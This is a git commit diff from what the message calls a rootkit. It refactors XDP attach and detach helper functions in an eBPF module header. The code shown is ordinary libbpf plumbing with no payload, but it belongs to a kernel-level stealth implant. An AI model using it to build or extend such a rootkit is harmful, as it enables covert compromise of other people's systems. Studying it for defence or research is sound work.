Completed configuration module which enables to change the running ebpf modules in the rootkit at runtime. Minor changes and updated code structure

2026-01-05 16:03:08 +08:00 · 2022-01-04 13:26:13 -05:00
parent 40da6b300b
commit 74873dbca5
10 changed files with 150 additions and 40 deletions
--- a/src/user/include/modules/xdp.h
+++ b/src/user/include/modules/xdp.h
@@ -1,7 +1,14 @@
 #ifndef __MOD_XDP_H
 #define __MOD_XDP_H

-int attach_xdp_all(struct xdp_filter_bpf *skel, __u32 ifindex, __u32 flags){
+#include <bpf/bpf.h>
+#include <bpf/libbpf.h>
+#include <linux/if_link.h>
+#include "common.h"
+#include <sys/resource.h>
+#include "xdp_filter.skel.h"
+
+int attach_xdp_receive(struct xdp_filter_bpf *skel, __u32 ifindex, __u32 flags){
    //Attach BPF program to network interface
 	//New way of doing it: it allows for future addition of multiple 
 	//XDP programs attached to same interface if needed
@@ -47,14 +54,22 @@ int attach_xdp_all(struct xdp_filter_bpf *skel, __u32 ifindex, __u32 flags){
    return 0;
 }

-int detach_xdp_all(struct xdp_filter_bpf *skel){
-    int err = bpf_link__destroy(skel->links.xdp_receive);
+int attach_xdp_all(struct xdp_filter_bpf *skel, __u32 ifindex, __u32 flags){
+    return attach_xdp_receive(skel, ifindex, flags);
+}
+
+
+int detach_xdp_receive(struct xdp_filter_bpf *skel){
+    int err = detach_link_generic(skel->links.xdp_receive);
    if(err<0){
        fprintf(stderr, "Failed to detach XDP program\n");
 		return -1;
    }
-
    return 0;
 }

+int detach_xdp_all(struct xdp_filter_bpf *skel){
+    return detach_xdp_receive(skel);
+}
+
 #endif